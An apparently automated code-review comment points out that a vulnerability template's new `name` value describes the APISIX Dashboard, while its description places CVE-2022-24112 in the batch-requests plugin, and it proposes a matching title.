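Review bot: The new `name` value, `Apache APISIX Dashboard 是 Apache APISIX 网关的可视化管理界面` ("APISIX Dashboard is the visual management interface of the APISIX gateway"), names a different product and is a product blurb rather than a vulnerability title: the unchanged `description` in this same hunk places CVE-2022-24112 in APISIX's batch-requests plugin, not in the Dashboard. `name` is what shows up in listings, so a mismatched product will misdirect triage. I would keep the previous value or use `name: Apache APISIX batch-requests Admin API IP-restriction bypass / RCE (CVE-2022-24112)`.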